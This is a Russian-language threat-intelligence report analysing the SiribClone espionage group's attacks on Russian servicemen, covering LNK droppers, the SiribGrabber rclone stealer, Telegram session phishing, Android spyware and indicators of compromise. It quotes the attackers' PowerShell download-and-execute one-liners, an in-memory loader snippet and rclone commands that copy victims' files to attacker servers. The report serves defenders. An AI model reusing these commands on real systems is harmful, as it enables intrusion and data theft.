Вернуться назад

Приманка для командира: изучаем атаки кибершпионской группировки SiribClone на российских военных

Злоумышленники стремятся получить доступ к Telegram-аккаунтам бойцов, а также распространяют вредоносное ПО для заражения десктопных устройств и смартфонов.

Приманка для командира: изучаем атаки кибершпионской группировки SiribClone на российских военных

Военнослужащие ВС РФ — по-прежнему среди приоритетных целей атак различных киберпреступных группировок, которые занимаются шпионажем и мошенничеством.

В феврале 2026 года специалисты департамента киберразведки (Threat Intelligence) компании F6 обнаружили файл, исследование которого привело к раскрытию инфраструктуры ранее неизвестной группировки. Специалисты F6 назвали её SiribClone — по метаданным одного из атакующих и используемому инструменту rclone (утилита командной строки с открытым исходным кодом для работы с облачными хранилищами). Несмотря на небольшое количество обнаруженных публичных сэмплов, мы установили, что атакующие активно тестировали свои разработки с декабря 2025 года, а самые ранние следы фишинговой активности злоумышленников датируются летом 2025 года.

Кроме того, в ходе исследования мы выяснили, что группировка распространяет вредоносные файлы для десктопных и мобильных устройств, используя в качестве приманок приложения для «безопасного обмена фотографиями» и другие сервисы, документы на военную тематику, а также активно применяет социальную инженерию для получения доступа к Telegram-аккаунтам российских военнослужащих. Причём участники группировки под видом девушек, «желающих познакомиться», и волонтёров лично общаются с военными через популярные мессенджеры и платформы. Данная активность была зафиксирована в январе-феврале 2026 года, однако по обнаруженным сетевым артефактам можно предположить, что SiribClone применяет фишинг через Telegram с лета 2025 года по настоящее время.

В мае 2026 года, спустя несколько месяцев «молчания» SiribClone, мы обнаружили новые файлы группировки, которые злоумышленники распространяли через сайт, мимикрирующий под тематику Дня Победы («Бессмертный полк»).

Итоги исследования инфраструктуры новой группировки, инструментов, которые используют злоумышленники, представляем в этом блоге.

После прочтения сжечь

Файл, с которого началось наше исследование, был загружен на платформу для анализа файлов в феврале 2026 года. С Google-диска загружался файл под названием «Решение по СВОДУ.zip» по ссылке hxxps://drive[.]google[.]com/file/d/1DjDui8hEf6GXTJeeETXCo1r3NBizj1WR/view?usp=drive_link.

Рисунок 1 — Содержимое загруженного архива на Google-диске
Рисунок 1 — Содержимое загруженного архива на Google-диске

В архиве, защищенном паролем, находится файл «Решение по СВОДУ.docx.lnk». При открытии выполняется следующая команда, открывающая файл-приманку с hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx и запускающая файл REA.md с GitHub:

 /c powershell -c "$i=$env:TEMP+'\SVODU.docx';
iwr hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx -o $i;
Start-Process $i;
irm hxxps://github[.]com/evon-ch/ob/raw/refs/heads/main/REA[.]md | iex" 
Рисунок 2 — Документ-приманка на военную тематику
Рисунок 2 — Документ-приманка на военную тематику

Также в самом ярлыке содержались следующие метаданные:

 Working directory: C:\Users\s1r1b\Downloads
Machine identifier: zam040k 

Скачиваемый файл REA.md представляет собой PowerShell-скрипт, содержащий встроенный массив байтов. Скрипт загружает этот массив в память как .NET сборку и вызывает метод Down() класса Vmngr:

 [byte[]]$d=@(<bytes>);
 [System.Reflection.Assembly]::Load($d);
 [vmngr]::Down() 

Загруженная .NET сборка выполняет роль загрузчика: во временную директорию пользователя загружает файл vmngr.dll с https://github[.]com/evon-ch/ob/raw/refs/heads/main/vmngr.dll. Далее DLL загружается в процесс через LoadLibrary, выполняется ее функция Wrapper, и управление передается основной полезной нагрузке. В артефактах сборки был найден следующий путь: «C:\Users\s1r1b\source\repos\price+\vmngrr\obj\Release\vmngrr.pdb».

Рисунок 3 — Содержимое загрузчика
Рисунок 3 — Содержимое загрузчика

Загружаемая vmngr.dll предназначена для эксфильтрации интересующих злоумышленника файлов с использованием rclone. Ее PDB-путь: «C:\Users\s1r1b\source\repos\price+\x64\Release\price++.pdb». Специалисты F6 назвали это ВПО SiribGrabber.

Для получения конфигурации DLL расшифровывает URL-ссылку алгоритмом Base64 → AES CBC, в результате получая URL hxxps://evon-ch.github[.]io/ob/conf.txt. Далее DLL выполняет запрос для получения конфигурации к данной URL, расшифровывает конфигурацию тем же алгоритмом и парсит по набору параметров.

Рисунок 4 — Зашифрованная конфигурация rclone в репозитории злоумышленника
Рисунок 4 — Зашифрованная конфигурация rclone в репозитории злоумышленника
Рисунок 5 — Расшифрованная конфигурация
Рисунок 5 — Расшифрованная конфигурация

Для загрузки rclone DLL сначала проверяет наличие rclone по пути %LocalAppData%\rc\{rclone_directory_name}, где {rclone_directory_name} должен совпадать с наименованием архива из URL, указанным в параметре «rz_zip_down». В случае если директория отсутствует, DLL скачивает архив с rclone и сохраняет по файловому пути %LocalAppData%\rc.zip, распаковывает в директорию %LocalAppData%\rc\ и удаляет архив.

Параметр blacklist отвечает за проверку системы по machineGUID. Если значение совпадет со значениями из списка, сэмпл прекращает работу.

Перед подключением выполняет проверку доступности удаленного сервера из конфигурации командой ping.

 ping -n 3 -w 2000 {ip} 

После проверки подключения с помощью ping к указанным серверам в конфигурации создается профиль подключения rclone.

 rclone.exe config create 229 sftp host={ip} user={user} port={port} pass={pass} key_file= key_file_pass= pubkey_file= key_use_agent=false use_insecure_cipher=false disable_hashcheck=false 

Параметры {ip}, {user}, {port}, {pass} передаются на ВПО в конфигурации в виде объектов массива «svrs». После успешной конфигурации подключения SiribGrabber выполняет сбор логических дисков. По очереди для каждого диска выполняется команда, цель которой — копирование файлов с заданным набором фильтров с логического диска зараженной системы на удаленное хранилище, подконтрольное злоумышленнику. Копирование происходит в директорию по файловому пути шаблона /rc/{computername}--{machine_guid}/.

Пример команды:

 rclone.exe copy --copy-links {drive_path} 229:/rc/{computername}--{machine_guid}/ --filter "+ /" --filter "- /$Recycle.Bin/**" --filter "- /System Volume Information/**" --filter "- /Windows/**" --filter "- /Program Files/**" --filter "- /Program Files (x86)/**" --filter "- /ProgramData/**" --filter "- /PerfLogs/**" --filter "- /Intel/**" --filter "- /AMD/**" --filter "- /NVIDIA/**" --filter "- /MSOCache/**" --filter "- /boot/**" --filter "+ *.pdf" --filter "+ *.doc*" --filter "+ *.odt" --filter "+ *.txt" --filter "+ *.csv" --filter "+ *.xls*" --filter "+ *.ppt*" --filter "+ *.jpg" --filter "+ *.jpeg" --filter "+ *.png" --filter "+ *.gif" --filter "+ *.webp" --filter "+ *.hei*" --filter "+ *.bmp" --filter "+ *.tif*" --filter "+ *.mp4" --filter "+ *.mkv" --filter "+ *.avi" --filter "+ *.mov" --filter "+ *.wm*" --filter "+ *.3gp" --filter "+ *.webm" --filter "+ *.aac" --filter "+ *.flv" --filter "+ *.mp3" --filter "+ *.zip" --filter "+ *.rar" --filter "+ *.7z" --filter "+ *.iso" --filter "+ *.exe" --filter "+ *.msi" --filter "+ *.apk" --filter "- *" --bwlimit 2M --transfers 2 --checkers 4 --buffer-size 16M --ignore-checksum --fast-list --size-only --ignore-existing --retries 100 --retries-sleep 5m --low-level-retries 50 

Также для каждого логического диска собранная итоговая команда будет записана в BAT-файл по пути %LocalAppData%/rc/rc{drive}.bat. После чего будет создан одноименный PS1-файл по файловому пути %LocalAppData%/rc/rc{drive}.ps1. Данный файл будет закреплен в системе путем добавления ключа с именем, имеющим шаблон rc{drive}, в ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.

Таким образом после исследования файла мы установили два адреса атакующих (185[.]186[.]244[.]57 и 185[.]17[.]3[.]215) и профиль evon-ch в GitHub.

Исследование GitHub-профилей

В профиле evon-ch был найден один репозиторий, первые коммиты в который были сделаны 24 января 2025 года. Активность профиля evon-ch была эпизодической, и большая часть коммитов по всей видимости предназначалась для тестирования и отладки.

Рисунок 6 — Таймлайн активности атакующего в GitHub
Рисунок 6 — Таймлайн активности атакующего в GitHub

Первые коммиты содержали эксперименты над полезной нагрузкой — в виде ps-скрипта, набора байтов или исполняемого файла.

Мы также обнаружили разные версии конфигурации ВПО в коммитах evon-ch. К примеру, начиная с апреля 2026 года атакующий добавил команду для кражи Telegram-сессии (однако по умолчанию папка с данными Telegram находится в другой директории).

Рисунок 9 — Конфигурация одного из апрельских коммитов (расшифрованная)
Рисунок 9 — Конфигурация одного из апрельских коммитов (расшифрованная)
Рисунок 10 — Расшифрованная ps-команда из конфигурации
Рисунок 10 — Расшифрованная ps-команда из конфигурации

В другой конфигурации папка с данными Telegram была указана верно, а эксфильтрация производилась по заготовленному пути «229:/rc/$env:COMPUTERNAME--a5bc6d29-d0a7-4746-b01d-addbf5976d5e/Users/MARS/AppData/Roaming/Telegram Desktop/». Присутствие определенных GUID и имен пользователей в путях может означать, что тестирование конфигураций могло происходить в среде атакующего.

Рисунок 11 — Пример другой расшифрованной команды из конфигурации
Рисунок 11 — Пример другой расшифрованной команды из конфигурации

В одном из ранних коммитов полезная нагрузка загружалась по ссылке hxxps://files[.]catbox[.]moe/4nnmhq.dll. Конфигурация для rclone в этом файле 4nnmhq.dll берется с hxxps://github[.]com/s1r1ban/pagesService[.]github[.]io/blob/main/config.txt. Указанные С2 для эксфильтрации: 208[.]92[.]227[.]183 и 185[.]186[.]244[.]57.

Вот так мы обнаружили второй GitHub-профиль атакующих с тем же ником, который фигурировал в PDB-путях DLL (s1r1b) и метаданных LNK, описанных выше. Данный профиль был активен с 24 декабря 2025 года по 6 февраля 2026 года.

Рисунок 12 — Профиль пользователя s1r1ban
Рисунок 12 — Профиль пользователя s1r1ban

В профиле s1r1b коммиты содержали еще более ранние конфигурации для тестирования. Интересно, что в данном репозитории конфигурация была зашифрована тем же ключом, что и в описанном сэмпле.

Также в метаданных LNK из части «После прочтения сжечь» обнаружили ник zam040k. По нему удалось найти некоторые комментарии шестилетней давности на украинских форумах и старый GitHub-аккаунт.

Исследование сетевой инфраструктуры

Благодаря исследованию первоначального файла и GitHub-профилей удалось обнаружить, что атакующими в качестве С2 в конфигурациях ВПО использовались следующие адреса:

  • 185[.]17[.]3[.]215;
  • 185[.]186[.]244[.]57;
  • 208[.]92[.]227[.]183.

С помощью графового анализа мы нашли следующие индикаторы, связанные с атакующими:

  • IP 185[.]17[.]3[.]215 и 185[.]139[.]69[.]136 были связаны общим SSH-отпечатком.
Рисунок 16 — Общий SSH-отпечаток
Рисунок 16 — Общий SSH-отпечаток
  • Также следующие IP были связаны одним ETag: 185[.]17[.]3[.]215, 185[.]139[.]69[.]136, 208[.]92[.]227[.]183, 185[.]186[.]244[.]57, 104[.]128[.]140[.]74.
Рисунок 17 — Общий ETag
Рисунок 17 — Общий ETag

Наибольший интерес представляют следующие два адреса — 185[.]186[.]244[.]57 и 185[.]17[.]3[.]215 — из-за расположенных на них веб-страниц «КОНТУР» и «Telegram Session Manager».

Рисунок 18 — Информация о веб-страницах
Рисунок 18 — Информация о веб-страницах

На указанных адресах была расположена страница входа в менеджер похищенных Telegram-сессий. Изначально приложение не имело названия и было размещено на адресе 185[.]186[.]244[.]57, а затем «переехало» на новый адрес 185[.]17[.]3[.]215 уже с названием «КОНТУР». «КОНТУР» — внутреннее приложение атакующих, которое они используют для просмотра сообщений скомпрометированных аккаунтов. Про сам способ получения доступа к аккаунтам расскажем далее.

Рисунок 19 — Страница входа на страницу с IP 185[.]17[.]3[.]215
Рисунок 19 — Страница входа на страницу с IP 185[.]17[.]3[.]215

Изнутри приложение выглядит следующим образом: слева находится список скомпрометированных аккаунтов, справа — список каналов и чатов жертвы. Данные похищенных сессий хранятся в базе данных. Атакующие также добавили возможность «заметок» по жертвам: краткое описание личности, геолокации и должности, а также кем был «отработан» пользователь.

Исходя из анализа заметок злоумышленников можно сделать вывод, что цель их атак — военнослужащие ВС РФ, которые находятся на приграничных территориях и в зоне проведения СВО. Судя по описанию геолокаций атакованных пользователей, упоминаниям их званий и войсковых частей, задача атакующих — военный шпионаж.

На найденных IP-адресах располагались несколько доменов. Они были предназначены для фишинговых страниц со входом через Telegram. Мы нашли несколько заготовок страниц на различные темы: «облачное хранилище», «присоединение к каналу», «видеоплеер TkTk» и другие.

Сайты атакующих работали так, что при переходе на домен без идентификатора (или с устаревшим) в URL показывалась заглушка. Злоумышленники использовали идентификатор в ссылках вида example.com/auth/[a-z0-9]{9}, которые присылали пользователям.

Рисунок 29 — Заглушка с сервера злоумышленников
Рисунок 29 — Заглушка с сервера злоумышленников

Пользователей заманивают на фейковые страницы, где предлагают ввести номер телефона, код для входа Telegram и при необходимости 2FA‑пароль («облачный пароль»). Сервер делает запрос к Telegram API, получает авторизацию и сохраняет sessionString — строку, которая даёт атакующим доступ к аккаунту пользователя.

Как это работает.

  1. Пользователь открывает фейковую страницу → вводит номер телефона.
  2. Сервер вызывает auth.SendCode через TelegramClient — Telegram отправляет код пользователю.
  3. Пользователь вводит код → сервер вызывает auth.SignIn. Если код и/или пароль 2FA верны, клиент атакующих сохраняет sessionString.
  4. Полученный sessionString злоумышленники отправляют/сохраняют в несколько мест:
  • Google Sheets;
  • Imprint URL;
 IMPRINT_URL=hxxps://nordens[.]pw/2qh 
  • Внешние сервисы по HTTP (например, POST на 185[.]186[.]244[.]57 и 185[.]17[.]3[.]215).

Рассмотрим методы эксфильтрации и хранимые на них данные:

  • POST-запросы уходят в приложение «КОНТУР», описанное выше. В этом приложении атакующие просматривают чаты скомпрометированных пользователей.
  • Google Sheets — содержит json с номерами телефонов и sessionString:
Рисунок 30 — Содержимое Google Sheets
Рисунок 30 — Содержимое Google Sheets
  • Imprint URL — про домен nordens[.]pw не было найдено значимой информации, сам домен скрыт за сервисами Cloudflare и при обращении выдает ошибку 404.

По заготовкам страниц, заглушке и обнаруженным IP-адресам, специалисты F6 нашли следующие домены:

Domain IP
rufiles[.]com 185[.]139[.]69[.]136
cloudmail[.]watch CDN
tgme-join[.]link 185[.]17[.]3[.]215
stormapi[.]live 185[.]17[.]3[.]215
joinchat[.]click 185[.]17[.]3[.]215
alimony[.]work 185[.]139[.]69[.]136
tktk[.]photo 185[.]17[.]3[.]215
test-result[.]online 185[.]17[.]3[.]215
stihipobedy[.]online 185[.]17[.]3[.]215, 185[.]139[.]69[.]136
cdekpost[.]express 185[.]17[.]3[.]215, 185[.]139[.]69[.]136
joinlink[.]live 185[.]17[.]3[.]215
telegra[.]ink 185[.]17[.]3[.]215
tme[.]wiki 185[.]17[.]3[.]215
tgdisc[.]me 208[.]92[.]227[.]183
telegrarm[.]me 208[.]92[.]227[.]183
getlogin[.]xyz 208[.]92[.]227[.]183
cloudisk[.]my 138[.]124[.]69[.]153
cloudmail[.]agency CDN
telgrm-service[.]org CDN
cloud-mail-ru[.]pro CDN
rumail[.]cloud CDN
sexcrimea[.]xyz CDN
verification[.]my CDN
lukoil[.]vip CDN
bezsmertniypolk[.]online 185[.]17[.]3[.]215
helpmax[.]live 185[.]17[.]3[.]215
geroispecoperacii[.]com 185[.]17[.]3[.]215
project-matrix[.]net 185[.]17[.]3[.]215
max-client[.]support 185[.]17[.]3[.]215
invites[.]cloud 185[.]139[.]69[.]136
tgverify[.]info 185[.]139[.]69[.]136

Самый ранний из обнаруженных доменов — verification[.]my — был просканирован на сервисе для анализа ссылок 2 июня 2025 года.

Рисунок 31 — Результат сканирования
Рисунок 31 — Результат сканирования

На одном из доменов, обнаруженных на 185[.]17[.]3[.]215, мы обнаружили карту боевых действий — вероятно, она также использовалась в качестве приманки.

Рисунок 32 — Страница на одном из обнаруженных доменов
Рисунок 32 — Страница на одном из обнаруженных доменов

Социальная инженерия и знакомства

Несмотря на то, что исследование началось с атаки, направленной на пользователей ПК, изучение инфраструктуры злоумышленника позволило сделать вывод, что это далеко не единственная деятельность группировки. Обнаруженные домены предназначены для получения доступа к Telegram-сессиям, а сами пользователи Telegram были скомпрометированы при помощи социальной инженерии. Однако можно предположить, что мессенджер Telegram — не единственный вектор атаки: злоумышленники регистрировали домены, мимикрирующие под другие сервисы, а также могли искать нужных им пользователей через сайты знакомств.

В основном злоумышленники под видом девушек знакомились с военнослужащими (что, возможно, было понятно из их анкет) через приложения для знакомств в Telegram и на других популярных платформах. Далее в ходе переписки «девушки» под разными предлогами предлагали пользователям перейти по ссылке . К примеру, наши специалисты зафиксировали такие схемы.

  • «Обычное общение»: в одном диалоге девушка под предлогом тестирования своего приложения присылает ссылку на его загрузку. Или для «безопасного» обмена фотографиями делится ссылкой на сайт, который маскируется под «облачный сервис» Telegram.
  • «Волонтёры предлагают помощь»: злоумышленники представлялись волонтерами, предлагающими заполнить таблицу по ссылке.
Рисунок 36 — Пример переписки и фишинговой ссылки от злоумышленника под видом волонтера
Рисунок 36 — Пример переписки и фишинговой ссылки от злоумышленника под видом «волонтера»
  • Также удалось установить, что атакующие рассылали apk-файлы с названиями «Safeintim.apk» (другие варианты — «SafeintimZ.apk», «ZafeintimZ.apk», атакующие меняли названия). Через это приложение атакующие предлагали якобы «безопасно» обменяться фотографиями. Судя по названию этих файлов, предполагалось, что фото для обмена будут носить интимный характер.
Рисунок 37 — Главная страница вредоносного приложения, предназначенного якобы для обмена интимными фото
Рисунок 37 — Главная страница вредоносного приложения, предназначенного якобы для обмена интимными фото

Анализ вредоносных APK-файлов

Специалисты F6 провели анализ обнаруженных APK-файлов. Дальнейшее описание строится на анализе файла «Zafeintim.apk» (SHA1: a2ca0914afc0e9d54f98496f9ae4a387bf7f4228). Это новое ВПО получило название SafeLoveStealer и классифицировано как Spyware со следующими основными возможностями:

  • передача информации устройства;
  • передача геопозиции;
  • передача информации сети;
  • передача информации WiFi-модема;
  • сбор файлов с устройства (аудио, видео, фото, документы);
  • запись с микрофона;
  • распознавание речи.

Цель этого ВПО — получить максимально возможный объём личных, технических и географических данных со скомпрометированного устройства, сохранить их в скрытом виде и без ведома пользователя передать на сервер. Приложение маскируется под легитимное приложение обмена фотографиями. Запрашивает минимальное количество разрешений, имитирует реальную работу приложения.

Приложение запрашивает разрешение на полный доступ к файлам и на запись звука. Далее генерирует user_id и получает конфигурацию с https://github[.]com/evgenprosturkin-web/config.github.io. Используются следующие файлы:

  • json — зашифрованный список С2 серверов;
  • json — черный список user_id, с которых не будет собираться информация.

Приложение запускает ряд задач, в каждую передается userId. Таблица с задачами, эндпоинтами и отправляемыми данными представлена ниже.

Endpoint Функциональность Отправляемые данные Имя отправляемого файла
/appLaunched Отправка данных при старте приложения usedId; время запуска; версия приложения
/testfile Проверка доступности сервера
/speedtest Отправка данных о скорости передачи userId; ping; speed
/newGeoLocation Функция GeoUploadWorker отвечает за сбор геопозиции usedId; текущее время; идентификатор устройства; широта и долгота геопозиции geo_batch_[time].txt
/wifiInfo Функция WiFiUploadWorker отвечает за сбор информации о Wi-Fi usedId; текущее время; идентификатор устройства; при определении соединения имя роутера, SSID, BSSID; при определении доступных Wi-Fi сетей – их список SSID, BSSID, уровень сигнала wifi_info_[time].txt
/upload/device_info Функция DeviceInfoUploadWorker отвечает за сбор информации об устройстве usedId; текущее время; идентификатор устройства device_info_[time].txt
/upload/network_info Функиця NetworkInfoUploadWorker  отвечает за сбор информации о сети usedId; текущее время; локальный IP; внешний IP (используется сервис ip-api.com); MAC-адрес; страна; регион; город; широта и долгота network_info_[time].txt
/tus/upload Функция ImageUploadWorker отвечает за сбор фото с устройства; AudioUploadWorker – за сбор аудиофайлов; VideoUploadWorker – за сбор видеофайлов; DocumentUploadWorker – за сбор документов Для фото, видео и аудиофайлов - файлы, собранные в корневой директории пользователя (storage/emulated/0). Для документов – файлы из папок "Camera", "Pictures", "Movies".

Также приложение в фоновом режиме запускает сервис AudioRecorderService, который проверяет входящий аудиопоток на наличие голоса через библиотеку android-vad. При нахождении голоса сохраняет аудиофайл в директорию /data/user/0/[package]/files/AudioRecordings. При этом у пользователя будет отображаться уведомление.

Рисунок 38 — Уведомление об активности сервиса AudioRecorderService на скомпрометированном устройстве
Рисунок 38 — Уведомление об активности сервиса AudioRecorderService на скомпрометированном устройстве

Само приложение выполняет свой функционал, маскируясь под легитимное ПО. При нажатии кнопки «Загрузить на сервер» пользователь выбирает файл и отправляет его на сервер. При нажатии кнопки «Посмотреть по ключу» пользователь указывает ключ (имя папки, с которой загружаются файлы) и сервер возвращает данные.

В Github-профиле evgenprosturkin-web, где хранилась конфигурация, были найдены уже упомянутые раннее адреса: 208[.]92[.]227[.]183, 185[.]17[.]3[.]215, 185[.]186[.]244[.]57. Сам профиль был активен с 18 января по 1 апреля 2026 года.

Рисунок 39 — Таймлайн активности Github-профиля evgenprosturkin-web
Рисунок 39 — Таймлайн активности Github-профиля evgenprosturkin-web

Атаки продолжаются

Спустя несколько месяцев мы зафиксировали возобновление активности киберпреступной группировки, направленной на десктопные устройства. 12 мая на платформе для анализа файлов был замечен архив под названием «anketa2». Он включал в себя ярлык «Анкета.lnk» и два изображения.

Рисунок 40 — Содержимое архива
Рисунок 40 — Содержимое архива

Команда ярлыка аналогична той, что была обнаружена в первом файле, и отвечает за скачивание и открытие файла-приманки с сервера атакующих и запуска нагрузки следующего этапа с Github.

 /c powershell -c "$i=$env:TEMP+'\Анкета.docx';
iwr 'http://185.186.244.57:8754/06VFFR' -OutFile $i;
Start-Process $i;
irm github.com/evon-ch/ob/raw/refs/heads/main/REA.md | iex 
Рисунок 41 — Документ-приманка
Рисунок 41 — Документ-приманка

Финальная полезная нагрузка представляет собой SiribGrabber с теми же С2, что и в февральской конфигурации — 185[.]186[.]244[.]57 и 185[.]17[.]3[.]215. Данный вариант SiribGrabber является обновленной версией, но основной целью ВПО все так же остается кража данных с использованием rclone.

Анализ файла на платформе MDP F6 (F6 Malware Detonation Platform).

Незадолго до этого (1 мая) на одном из адресов атакующих (185[.]17[.]3[.]215) был зарегистрирован домен bezsmertniypolk[.]online. Главная страница домена предлагает пользователям добавить героев войны на участие в онлайн-форате «Бессмертного полка». При нажатии кнопки «Принять участие» открывается форма, после заполнения которой предлагается загрузить и заполнить итоговую анкету в двух экземплярах.

Рисунок 42 — Главная страница домена bezsmertniypolk[.]online
Рисунок 42 — Главная страница домена bezsmertniypolk[.]online

Рисунок 43 — Процесс заполнения анкеты
Рисунок 43 — Процесс заполнения анкеты
Рисунок 44 — После заполнения анкеты пользователю предлагают загрузить итоговую заявку
Рисунок 44 — После заполнения анкеты пользователю предлагают загрузить «итоговую заявку»

Если пользователь нажмет на кнопку «Скачать заявку», произойдет загрузка двух архивов: «Бессмертный полк — анкета-1.zip» и «Бессмертный полк — анкета-2.zip». Содержимое второго архива мы разобрали выше, а содержимое первого отличается лишь ссылкой для загрузки аналогичного документа-приманки в ярлыке — http://185[.]17[.]3[.]215:8754/QMP8XK.

Спустя некоторое время URL (http://185[.]186[.]244[.]57:8754/06VFFR) для скачивания приманки был настроен на редирект http://185[.]186[.]244[.]57:8754/hello.html. Данная страница отображала текст песни Lionel Richie — «Hello».

Рисунок 45 — Страница http://185[.]186[.]244[.]57:8754/hello.html
Рисунок 45 — Страница http://185[.]186[.]244[.]57:8754/hello.html

Вывод

Киберпреступная группировка SiribClone атакует военнослужащих с целью сбора личных и геоданных, переписки и другой информации. Эти атаки проводятся с использованием разных инструментов и тактик — социальная инженерия на этапе привлечения пользователей через мессенджеры, шпионское ПО SafeLoveStealer для заражения Android-устройств под видом полезных приложений и вредоносное ПО для Windows SiribGrabber для заражения десктопных устройств, которое распространяют под видом письма, связанного с темой СВО. Операционная модель демонстрирует высокую адаптивность злоумышленников и постоянный поиск новых возможностей для атак на российских пользователей.

Индикаторы компрометации

Файловые индикаторы

Имя файла SHA-256 SHA1 MD5
Решение по СВОДУ[.]zip f24bda38c02e4d20417cf5b6410e955dcf4a16ed0cb299eb4847dae1f4513754 2b7f513b9d7b465312b80217d4c61a092ed6e173 29e01e2baa859d58f51e6b09f775a0cd
Решение по СВОДУ.docx.lnk 46b540454ddf4dbab3a85e6bcf96e5d492e89f847b9cac61398a70936fccfe2b 9806e22cc1284140d73f16174481ae0409bdf29c 7b782a6b012aaa08531bd9023a018dad
REA[.]md addf650d7da70065a780a0f66562da8d9f9868b074411686bb485bf3ed6419ae 0b213b7f66754b8f655aec85742a19df433f9270 5a347a773b02c62abec8e15dcf91e969
REA[.]md payload (vmngrr.dll) de44a8fa951e2c6b12b0f1f84b48738c18ba1c623258debce9b583173c1276a7 f52edeeb878901ce1c459b4c14e734c42c7e535b db1d4c65473ca6a20d504957fa362e45
vmngr.dll c3350c110ccb6feaf976b1e12adfeeda46ab11c175cd71064bbb4d9511a17c04 f9401374b88591c4da92265a0ef930993de2cdfb 322f9389fc17a287f5b89be306ff46a6
Анкета.lnk 877740250f7187aac3801ac27e127c5999dcc49289a3a7bfebb4004197ed7050 e04f327643c15a24095228224879305108eb1d49 dbfd5177b044514703dec50b5ca5a028
Анкета.lnk 15346cb21843f5250bc2a3af7f73ff814f5eab1272bf89b12c59d988526c219f 2b452223bd317d24ff0b0cfc38b966e0801ed19e b1002fecbb18ba056e8b8fa80ad73757
Phost.exe 75f42a233af59677de769ec90757cc8f9c0ef9aacf18aa121ca4ec8760b495f9 15c86cf3f404170a54be958fe755ca0a5a0791e9 1620f739ecfbcd95e980e65103f25788
vmngr.dll 82d98ad305dbd402ef0c03318d0a9efba6ac40bd5546d2684c2345524302d345 02dbcdd03cb61e80f1c324a6d32a45deefefda9f 5b62b56d5bc31adde45a5bea2be6e9ba
Zafeintim.apk 3f89e299f8da51205e1d00b295c6b0953f60bec15e4356cb168b920a2adc8a23 a2ca0914afc0e9d54f98496f9ae4a387bf7f4228 c29f62d6e58854a0d44e77de01b94b3a
SafeintimZ.apk ae28651fd98dff904501c65c267ed355f95317873fa7e34bffb8fd0099807b4c ca6171b8a3d6443fe03bb277a5d51aa2acaa3657 815857a66e8b06d3d7053ad9786fcc11
ZafeintimZ.apk 7c4953d9b25e23d3a7bd7195555030433299736f011ec27a125be372226cecfb 2ff4834a519ed602028b0845d08594d3f4dda7e9 714f4e8a0f9388bcb028073583853aa0
ZafeintimZ.apk   8b3f9b3b2a653d700d16c257a80d4d3ae234ca414afd413cc9a99eb398adaef4 fc65c8adec6b3ef5b8f87c72634c21f1eb85a973 96d8e059691fa827f396eb05d954c234
SafeintimZ.apk d5eb20080b7747a883a4ef1917fb77afb2887b66516b7aea1f7a1d3ef96626c0 e5287d047c1c0e7c2c38e3eed7018b862d5a085c 0c0f5c64f7987a2a7cd48db65424e390
Safeintim.apk 886ae6fbfc66dc7146471a56a6cc588dce60c283379aa03f6ef627e5eebaa2d8 16f2e36c94ec427df584d156a1f518c10135c00c d508b796f26968a2150c81f755d0178a

Сетевые индикаторы

IP

185[.]186[.]244[.]57
104[.]128[.]140[.]74
185[.]139[.]69[.]136
185[.]17[.]3[.]215
208[.]92[.]227[.]183

Домены

rufiles[.]com
cloudmail[.]watch
tgme-join[.]link
stormapi[.]live
joinchat[.]click
alimony[.]work
tktk[.]photo
test-result[.]online
stihipobedy[.]online
cdekpost[.]express
joinlink[.]live
telegra[.]ink
tme[.]wiki
tgdisc[.]me
telegrarm[.]me
getlogin[.]xyz
cloudisk[.]my
cloudmail[.]agency
telgrm-service[.]org
cloud-mail-ru[.]pro
rumail[.]cloud
sexcrimea[.]xyz
verification[.]my
lukoil[.]vip
bezsmertniypolk[.]online
helpmax[.]live
geroispecoperacii[.]com
project-matrix[.]net
max-client[.]support
invites[.]cloud
tgverify[.]info

URL

hxxp://185[.]17[.]3[.]215:11317/content/pt/SVODU.docx
hxxps://drive[.]google[.]com/file/d/1DjDui8hEf6GXTJeeETXCo1r3NBizj1WR/view?usp=drive_link
hxxp://185[.]186[.]244[.]57:8754/06VFFR

GitHub-репозитории

hxxps://github[.]com/evon-ch/ob/
hxxps://github[.]com/s1r1ban/pagesService[.]github[.]io
hxxps://github[.]com/evgenprosturkin-web/config.github.io

Файловые артефакты

  • C:\Users\s1r1b\source\repos\price+\vmngrr\obj\Release\vmngrr.pdb
  • C:\Users\s1r1b\source\repos\price+\x64\Release\price++.pdb
  • Working directory: C:\Users\s1r1b\Downloads
  • Machine identifier: zam040k